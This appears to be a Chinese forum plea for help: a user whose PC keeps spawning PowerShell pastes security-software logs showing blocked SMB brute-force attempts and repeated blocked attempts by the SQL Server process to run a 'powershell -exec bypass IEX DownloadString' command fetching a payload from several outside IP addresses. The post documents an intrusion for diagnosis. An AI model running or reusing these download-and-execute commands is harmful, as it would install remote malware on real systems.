|
电脑总是自动打开powershell,而且一打开就是好几个,直接把内存占满,有时候还会死机,求救大神!!!
【1】2024-10-15 16:11:34,网络防护,暴破攻击防护,受到192.168.0.130的网络攻击,已阻止
协议:SMBv2
远程地址:192.168.0.130:55052
本地地址:192.168.0.198:445
防御结果:已阻止
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【2】2024-10-15 16:09:39,网络防护,暴破攻击防护,受到192.168.0.144的网络攻击,已阻止
协议:SMBv2
远程地址:192.168.0.144:55714
本地地址:192.168.0.198:445
防御结果:已阻止
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【3】2024-10-15 16:02:28,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://23.94.61.165:15650/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2024-10-15 16:02:27,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://23.94.61.165:15650/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【5】2024-10-15 16:02:26,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://62.3.6.65:18478/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【6】2024-10-15 16:02:26,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://62.3.6.65:18478/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【7】2024-10-15 16:02:25,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://144.48.227.75:17289/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【8】2024-10-15 16:02:25,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://144.48.227.75:17289/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【9】2024-10-15 15:49:36,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://124.193.140.189:17952/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【10】2024-10-15 15:49:36,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://124.193.140.189:17952/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【11】2024-10-15 15:49:35,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【12】2024-10-15 15:49:34,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【13】2024-10-15 15:49:34,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://46.17.45.73:17032/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【14】2024-10-15 15:49:33,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://46.17.45.73:17032/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【15】2024-10-15 15:27:02,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://124.133.240.174:16569/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【16】2024-10-15 15:27:01,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://124.133.240.174:16569/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【17】2024-10-15 15:27:00,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【18】2024-10-15 15:27:00,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【19】2024-10-15 15:27:00,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://46.17.45.73:17032/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【20】2024-10-15 15:26:59,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://46.17.45.73:17032/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【21】2024-10-15 15:09:24,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【22】2024-10-15 15:09:24,系统防护,应用加固,cmd.exe触犯应用加固规则, 已阻止
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数:powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://146.190.252.38:11080/57BC9B7E.Png');MsiMake "
操作结果:已阻止
保护进程路径:C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行:"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|
|